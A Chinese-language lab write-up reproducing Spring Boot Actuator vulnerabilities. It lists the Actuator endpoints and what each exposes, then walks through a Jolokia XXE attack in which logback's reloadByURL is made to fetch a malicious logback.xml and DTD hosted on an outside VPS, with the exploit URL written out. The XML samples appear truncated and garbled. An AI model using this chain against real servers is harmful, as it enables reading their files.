复现一下Sprint Boot的一些漏洞
环境搭建
Dump环境
Mvn构建项目
启动项目
端点信息
路径 描述
/autoconfig 提供了一份自动配置报告,记录哪些自动配置条件通过了,哪些没通过
/beans 描述应用程序上下文里全部的Bean,以及它们的关系
/env 获取全部环境属性
/configprops 描述配置属性(包含默认值)如何注入Bean
/dump 获取线程活动的快照
/health 报告应用程序的健康指标,这些值由HealthIndicator的实现类提供
/info 获取应用程序的定制信息,这些信息由info打头的属性提供
/mappings 描述全部的URI路径,以及它们和控制器(包含Actuator端点)的映射关系
/metrics 报告各种应用程序度量信息,比如内存用量和HTTP请求计数
/shutdown 关闭应用程序,要求endpoints.shutdown.enabled设置为true
/trace 提供基本的HTTP请求跟踪信息(时间戳、HTTP头等)
Spring Boot 1.x版本端点在根URL下注册
2.x版本端点移动到/actuator/路径
Jolokia漏洞利用
Jolokia漏洞利用(XXE)
jolokia/list
查看jolokia/list中存在的 Mbeans,是否存在logback 库提供的reloadByURL方法
创建logback.xml和fileread.dtd文件
logback.xml
xml version="1.0" encoding="utf-8" ?>
%remote;%int;]>
&trick;
fileread.dtd
">
将文件上传到公网VPS上并且开启http服务
远程访问logback.xml文件
127.0.0.1:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/x.x.x.x!/logback.xml